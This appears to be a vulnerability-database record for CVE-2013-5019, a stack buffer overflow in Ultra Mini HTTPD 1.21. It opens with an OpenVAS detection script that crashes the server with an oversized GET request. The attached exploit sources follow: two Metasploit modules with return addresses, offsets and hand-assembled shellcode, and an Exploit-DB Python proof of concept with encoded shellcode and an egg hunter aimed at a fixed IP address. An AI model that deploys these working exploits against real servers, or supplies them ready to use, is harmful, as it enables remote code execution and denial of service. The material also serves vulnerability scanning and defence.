Ultra Mini HTTPD Stack Buffer Overflow Vulnerability
2013-07-16T00:00:00
ID OPENVAS:1361412562310803721 Type openvas Reporter Copyright (C) 2013 Greenbone Networks GmbH Modified 2020-07-17T00:00:00
Description
The host is running Ultra Mini HTTPD server and is prone to stack based buffer
overflow vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
#
# Ultra Mini HTTPD Stack Buffer Overflow Vulnerability
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.803721");
script_version("2020-07-17T08:17:17+0000");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2013-5019");
script_tag(name:"last_modification", value:"2020-07-17 08:17:17 +0000 (Fri, 17 Jul 2020)");
script_tag(name:"creation_date", value:"2013-07-16 11:19:36 +0530 (Tue, 16 Jul 2013)");
script_name("Ultra Mini HTTPD Stack Buffer Overflow Vulnerability");
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to cause
the application to crash, creating a denial-of-service condition.");
script_tag(name:"vuldetect", value:"Send a large crafted data via HTTP GET request and check
the server is crashed or not.");
script_tag(name:"affected", value:"Ultra Mini HTTPD server Version 1.21.");
script_tag(name:"insight", value:"The flaw is due to an error when processing certain long requests and can be
exploited to cause a denial of service via a specially crafted packet.");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
script_tag(name:"summary", value:"The host is running Ultra Mini HTTPD server and is prone to stack based buffer
overflow vulnerability.");
script_tag(name:"solution_type", value:"WillNotFix");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/26739/");
script_xref(name:"URL", value:"http://exploitsdownload.com/exploit/windows/ultra-mini-httpd-121-stack-buffer-overflow");
script_category(ACT_DENIAL);
script_tag(name:"qod_type", value:"remote_vul");
script_copyright("Copyright (C) 2013 Greenbone Networks GmbH");
script_family("Buffer overflow");
script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
port = http_get_port(default:80);
res = http_get_cache(item:"/index.html", port:port);
if(!res || ">Ultra Mini Httpd" >!< res)
exit(0);
if(http_is_dead(port:port))
exit(0);
req = http_get(item:string("A", crap(10000)), port:port);
for(i = 0; i < 3; i++)
http_send_recv(port:port, data:req);
req = http_get(item:"/index.html", port:port);
res = http_send_recv(port:port, data:req);
if(!res || ">Ultra Mini Httpd" >!< res) {
security_message(port:port);
exit(0);
}
exit(99);
{"id": "OPENVAS:1361412562310803721", "type": "openvas", "bulletinFamily": "scanner", "title": "Ultra Mini HTTPD Stack Buffer Overflow Vulnerability", "description": "The host is running Ultra Mini HTTPD server and is prone to stack based buffer\n overflow vulnerability.", "published": "2013-07-16T00:00:00", "modified": "2020-07-17T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803721", "reporter": "Copyright (C) 2013 Greenbone Networks GmbH", "references": ["http://www.exploit-db.com/exploits/26739/", "http://exploitsdownload.com/exploit/windows/ultra-mini-httpd-121-stack-buffer-overflow"], "cvelist": ["CVE-2013-5019"], "lastseen": "2020-07-21T22:00:08", "viewCount": 3, "enchantments": {"dependencies": {}, "score": {"value": 7.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2013-5019"]}, {"type": "exploitdb", "idList": ["EDB-ID:44472"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/ULTRAMINIHTTP_BOF"]}, {"type": "nessus", "idList": ["GLOBAL_SETTINGS.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122811"]}, {"type": "zdt", "idList": ["1337DAY-ID-21109"]}]}, "exploitation": null, "vulnersScore": 7.5}, "pluginID": "1361412562310803721", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ultra Mini HTTPD Stack Buffer Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803721\");\n script_version(\"2020-07-17T08:17:17+0000\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2013-5019\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 08:17:17 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-07-16 11:19:36 +0530 (Tue, 16 Jul 2013)\");\n script_name(\"Ultra Mini HTTPD Stack Buffer Overflow Vulnerability\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to cause\n the application to crash, creating a denial-of-service condition.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a large crafted data via HTTP GET request and check\n the server is crashed or not.\");\n\n script_tag(name:\"affected\", value:\"Ultra Mini HTTPD server Version 1.21.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error when processing certain long requests and can be\n exploited to cause a denial of service via a specially crafted packet.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The host is running Ultra Mini HTTPD server and is prone to stack based buffer\n overflow vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/26739/\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/windows/ultra-mini-httpd-121-stack-buffer-overflow\");\n\n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default:80);\n\nres = http_get_cache(item:\"/index.html\", port:port);\nif(!res || \">Ultra Mini Httpd\" >!< res)\n exit(0);\n\nif(http_is_dead(port:port))\n exit(0);\n\nreq = http_get(item:string(\"A\", crap(10000)), port:port);\n\nfor(i = 0; i < 3; i++)\n http_send_recv(port:port, data:req);\n\nreq = http_get(item:\"/index.html\", port:port);\nres = http_send_recv(port:port, data:req);\n\nif(!res || \">Ultra Mini Httpd\" >!< res) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Buffer overflow", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645298940}}
{"zdt": [{"lastseen": "2018-01-05T17:07:32", "description": "This Metasploit module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21 allowing remote attackers to execute arbitrary code via a long resource name in an HTTP request.", "cvss3": {}, "published": "2013-08-15T00:00:00", "type": "zdt", "title": "Ultra Mini HTTPD Stack Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5019"], "modified": "2013-08-15T00:00:00", "id": "1337DAY-ID-21109", "href": "https://0day.today/exploit/description/21109", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Ultra Mini HTTPD Stack Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21\r\n allowing remote attackers to execute arbitrary code via a long resource name in an HTTP\r\n request.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'superkojiman', #Discovery, PoC\r\n 'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['OSVDB', '95164'],\r\n ['EDB','26739'],\r\n ['CVE','2013-5019'],\r\n ['BID','61130']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 1623,\r\n 'StackAdjustment' => -3500,\r\n 'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x2f\\x3f\"\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"thread\"\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [\r\n 'v1.21 - Windows XP SP3',\r\n {\r\n 'Offset' => 5412,\r\n 'Ret'=>0x77c354b4 # push esp / ret - msvcrt.dll\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jul 10 2013',\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n def exploit\r\n buf = rand_text(target['Offset'])\r\n buf << [target.ret].pack(\"V*\")\r\n buf << payload.encoded\r\n\r\n print_status(\"Sending buffer...\")\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => \"/#{buf}\"\r\n })\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/21109", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:32", "description": "", "cvss3": {}, "published": "2013-08-14T00:00:00", "type": "packetstorm", "title": "Ultra Mini HTTPD Stack Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5019"], "modified": "2013-08-14T00:00:00", "id": "PACKETSTORM:122811", "href": "https://packetstormsecurity.com/files/122811/Ultra-Mini-HTTPD-Stack-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Ultra Mini HTTPD Stack Buffer Overflow\", \n'Description' => %q{ \nThis module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21 \nallowing remote attackers to execute arbitrary code via a long resource name in an HTTP \nrequest. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'superkojiman', #Discovery, PoC \n'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit \n], \n'References' => \n[ \n['OSVDB', '95164'], \n['EDB','26739'], \n['CVE','2013-5019'], \n['BID','61130'] \n], \n'Payload' => \n{ \n'Space' => 1623, \n'StackAdjustment' => -3500, \n'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x2f\\x3f\" \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"thread\" \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ \n'v1.21 - Windows XP SP3', \n{ \n'Offset' => 5412, \n'Ret'=>0x77c354b4 # push esp / ret - msvcrt.dll \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jul 10 2013', \n'DefaultTarget' => 0 \n)) \nend \n \ndef exploit \nbuf = rand_text(target['Offset']) \nbuf << [target.ret].pack(\"V*\") \nbuf << payload.encoded \n \nprint_status(\"Sending buffer...\") \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => \"/#{buf}\" \n}) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122811/ultraminihttp_bof.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-12T22:39:26", "description": "This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21, allowing remote attackers to execute arbitrary code via a long resource name in an HTTP request. This exploit has to deal with the fact that the application's request handler thread is terminated after 60 seconds by a \"monitor\" thread. To do this, it allocates some RWX memory, copies the payload to it and creates another thread. When done, it terminates the current thread so that it doesn't crash and hence doesn't bring down the process with it.\n", "edition": 2, "cvss3": {}, "published": "2013-08-11T20:33:40", "type": "metasploit", "title": "Ultra Mini HTTPD Stack Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5019"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/HTTP/ULTRAMINIHTTP_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n ADDR_VIRTUALALLOC = 0x0041A140\n ADDR_CREATETHREAD = 0x0041A240\n ADDR_TERMINATETHREAD = 0x0041A23C\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Ultra Mini HTTPD Stack Buffer Overflow\",\n 'Description' => %q{\n This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21,\n allowing remote attackers to execute arbitrary code via a long resource name in an HTTP\n request. This exploit has to deal with the fact that the application's request handler\n thread is terminated after 60 seconds by a \"monitor\" thread. To do this, it allocates\n some RWX memory, copies the payload to it and creates another thread. When done, it\n terminates the current thread so that it doesn't crash and hence doesn't bring down\n the process with it.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'superkojiman', # Discovery, PoC\n 'PsychoSpy <neinwechter[at]gmail.com>', # Metasploit\n 'OJ Reeves <oj[at]buffered.io>' # Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '95164'],\n ['EDB','26739'],\n ['CVE','2013-5019'],\n ['BID','61130']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x2f\\x3f\"\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"thread\"\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'v1.21 - Windows Server 2000',\n {\n 'Offset' => 5412,\n 'Ret' => 0x78010324 # push esp / ret - msvcrt.dll\n }\n ],\n [\n 'v1.21 - Windows XP SP0',\n {\n 'Offset' => 5412,\n 'Ret' => 0x77C4C685 # push esp / ret - msvcrt.dll\n }\n ],\n [\n 'v1.21 - Windows XP SP2/SP3',\n {\n 'Offset' => 5412,\n 'Ret' => 0x77c354b4 # push esp / ret - msvcrt.dll\n }\n ],\n [\n 'v1.21 - Windows Server 2003 (Enterprise)',\n {\n 'Offset' => 5412,\n 'Ret' => 0x77BDD7F5 # push esp / ret - msvcrt.dll\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2013-07-10',\n 'DefaultTarget' => 0\n ))\n end\n\n def mov_eax(addr)\n \"\\xB8\" + [addr].pack(\"V*\")\n end\n\n def call_addr_eax(addr)\n mov_eax(addr) + \"\\xff\\x10\"\n end\n\n def exploit\n new_thread = \"\"\n\n # we use 0 a lot, so set EBX to zero so we always have it handy\n new_thread << \"\\x31\\xdb\" # xor ebx,ebx\n\n # store esp in esi, and offset it to point at the rest of the payload\n # as this will be used as the source for copying to the area of memory\n # which will be executed in a separate thread. We fill in the offset\n # at the end as we can calculate it instead of hard-code it\n new_thread << \"\\x89\\xe6\" # mov esi,esp\n new_thread << \"\\x83\\xc6\\x00\" # add esp,<TODO>\n esi_count_offset = new_thread.length - 1\n\n # Create a new area of memory with RWX permissions that we can copy\n # the payload to and execute in another thread. This is required\n # because the current thread is killed off after 60 seconds and it\n # takes our payload's execution with it.\n new_thread << \"\\x6a\\x40\" # push 0x40\n new_thread << \"\\x68\\x00\\x30\\x00\\x00\" # push 0x3000\n new_thread << \"\\x68\\x00\\x10\\x00\\x00\" # push 0x1000\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << call_addr_eax(ADDR_VIRTUALALLOC) # call VirtualAlloc\n\n # copy the rest of the payload over to the newly allocated area of\n # memory which is executable.\n payload_size = [payload.encoded.length].pack(\"V*\")\n new_thread << \"\\xb9\" + payload_size # mov ecx,payload_size\n new_thread << \"\\x89\\xc7\" # mov edi,eax\n new_thread << \"\\xf2\\xa4\" # rep movsb\n\n # kick of the payload in a new thread\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << \"\\x50\" # push eax (payload dress)\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << call_addr_eax(ADDR_CREATETHREAD) # call CreateThread\n\n # Terminate the current thread so that we don't crash and hence bring\n # the entire application down with us.\n new_thread << \"\\x53\" # push ebx (0)\n # set ebx to 0xFFFFFFFE as this is the psuedohandle for the current thread\n new_thread << \"\\x4b\" # dec ebx\n new_thread << \"\\x4b\" # dec ebx\n new_thread << \"\\x53\" # push ebx (0xFFFFFFFE)\n new_thread << call_addr_eax(ADDR_TERMINATETHREAD) # call CreateThread\n\n # patch the offset of esi back into the payload\n nops = 32\n decode_stub_size = 23\n calculated_offset = new_thread.length + nops + decode_stub_size\n new_thread[esi_count_offset, 1] = [calculated_offset].pack(\"c*\")\n\n # start constructing our final payload\n buf = rand_text_alpha_upper(target['Offset'])\n buf << [target.ret].pack(\"V*\")\n\n # ESP points right to the top of our shellcode so we just add a few nops\n # to the start to avoid having the first few bytes nailed by the decoder.\n buf << make_nops(nops)\n\n # we re-encode, including the thread creation stuff and the chosen payload\n # as we don't currently have the ability to \"prepend raw\" stuff to the front\n # of the buffer prior to encoding.\n buf << encode_shellcode_stub(new_thread)\n buf << payload.encoded\n\n print_status(\"Sending buffer...\")\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"/#{buf}\"\n })\n end\nend\n\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/ultraminihttp_bof.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:59:56", "description": "Stack-based buffer overflow in Ultra Mini HTTPD 1.21 allows remote attackers to execute arbitrary code via a long resource name in an HTTP request.", "cvss3": {}, "published": "2013-07-31T13:20:00", "type": "cve", "title": "CVE-2013-5019", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5019"], "modified": "2018-04-27T01:29:00", "cpe": ["cpe:/a:vector:ultra_mini_httpd:1.21"], "id": "CVE-2013-5019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vector:ultra_mini_httpd:1.21:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:51:47", "description": "A buffer overflow vulnerability has been reported in Vector Ultra Mini HTTPD. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system or cause application crashes.", "cvss3": {}, "published": "2015-03-26T00:00:00", "type": "checkpoint_advisories", "title": "Ultra Mini HTTPD Resource Name Request Handling Stack Buffer Overflow - Ver2 (CVE-2013-5019)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5019"], "modified": "2015-03-26T00:00:00", "id": "CPAI-2015-0386", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-04T17:35:04", "description": "", "cvss3": {}, "published": "2018-04-17T00:00:00", "type": "exploitdb", "title": "Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2013-5019", "CVE-2013-5019"], "modified": "2018-04-17T00:00:00", "id": "EDB-ID:44472", "href": "https://www.exploit-db.com/exploits/44472", "sourceData": "# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow\r\n# Date: 2018-04-14\r\n# Exploit Author: jollymongrel\r\n# Vendor Homepage: http://www.vector.co.jp\r\n# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html\r\n# Version: 1.2\r\n# Tested on: Windows 7 32-bit\r\n# CVE : CVE-2013-5019\r\n\r\nimport sys\r\nimport socket\r\nimport struct\r\n\r\neip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]\r\n\r\n#windows/exec - 274 bytes\r\n#http://www.metasploit.com\r\n#Encoder: x86/shikata_ga_nai\r\n#EXITFUNC=thread\r\n#CMD=calc.exe\r\n#badchars='\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x2f\\x3f'\r\nshellcode = (\"no0bno0b\"+\"\\xb8\\x21\\xa0\\xa2\\xbd\\xdb\\xd1\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\"\r\n\"\\x3e\\x31\\x43\\x15\\x83\\xc3\\x04\\x03\\x43\\x11\\xe2\\xd4\\x1a\\x51\\xd8\"\r\n\"\\x25\\xbd\\x4c\\xf4\\x90\\x35\\x55\\x0f\\x79\\x9f\\x5c\\x5e\\x45\\x5c\\xb5\"\r\n\"\\x5d\\x84\\x31\\x44\\x9d\\x46\\xde\\x89\\xb2\\x1a\\x92\\xe6\\x1d\\x26\\x1d\"\r\n\"\\xa1\\xb0\\xfa\\x6c\\x5a\\x1e\\xf7\\xb7\\xb6\\xfb\\x71\\xbf\\x2a\\x51\\xb6\"\r\n\"\\x2a\\x53\\x27\\x2a\\x43\\x49\\x67\\xe7\\x66\\x6a\\x6e\\xe3\\x10\\x46\\x27\"\r\n\"\\xe5\\x1f\\xc5\\xb5\\xad\\x32\\x57\\x38\\xd3\\x66\\xa8\\xa7\\xf8\\xe0\\xfc\"\r\n\"\\x1a\\x33\\xce\\x22\\xf0\\xad\\x34\\xff\\x3a\\x42\\x91\\x07\\x6d\\xe5\\xf1\"\r\n\"\\x79\\x73\\xa3\\xe9\\xbf\\xd7\\xbf\\xa7\\x10\\x06\\xf2\\x2c\\x81\\x6a\\xa0\"\r\n\"\\x97\\x46\\xae\\xe7\\x33\\x1c\\x87\\x02\\x5d\\x8d\\xd7\\x5a\\xbe\\x7c\\xa9\"\r\n\"\\x96\\x7f\\x04\\xbd\\xe4\\xb5\\xbc\\xa0\\xf5\\xf3\\x12\\x66\\x6c\\xbc\\xb7\"\r\n\"\\xb2\\x49\\x01\\x66\\xd3\\x8f\\x40\\x5b\\x33\\x07\\x22\\x30\\x0e\\x11\\xc6\"\r\n\"\\x89\\xfa\\xbc\\x18\\x0f\\x33\\x18\\xb1\\x01\\xe0\\x53\\x4a\\x23\\xab\\x77\"\r\n\"\\x17\\x7f\\xf8\\x4f\\xdd\\x01\\x79\\x04\\xa6\\x82\\xe0\\xc4\\x33\\x06\\x12\"\r\n\"\\x36\\x43\\x2d\\xc6\\x8a\\xfb\\x24\\x67\\x4a\\xc6\\x5a\\x4a\\x4c\\x97\\x4c\"\r\n\"\\x1b\\x68\\x98\\xf8\\x45\\x2d\\x86\\x43\\xbe\\x0e\\x96\\x8f\\xca\\x89\\x7e\"\r\n\"\\x5b\\xe1\\x8b\\xb2\\x5f\\xd0\\x94\\xdf\\x5e\\x7c\\x0e\\x25\\xa5\\xf7\\xea\"\r\n\"\\x9d\\x1b\\xa9\\x58\\x50\\x3a\\xb8\\x77\\x16\\xb1\\x87\\x48\\x94\\x37\\x87\"\r\n\"\\x9a\\x9d\\xe2\\xd0\")\r\n\r\n#egg hunter to search for no0bno0b\r\negghunter = (\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\n\"\\xef\\xb8\\x6e\\x6f\\x30\\x62\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\")\r\n\r\npayload = \"A\" * 537\r\npayload += shellcode\r\npayload += \"A\" * (967 - len(payload))\r\npayload += eip\r\npayload += egghunter\r\npayload += \"\\xff\\xe7\" #jmp edi\r\npayload += \"C\" * (1007 - len(payload))\r\n\r\nprint \"[+] sending payload, length\", len(payload)\r\n\r\nbuf = \"GET /\"+payload+\"HTTP/1.1\\r\\n\\r\\n\"\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((\"192.168.32.175\", 80))\r\ns.send(buf)\r\ndata = s.recv(1024)\r\ns.close()", "sourceHref": "https://www.exploit-db.com/download/44472", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
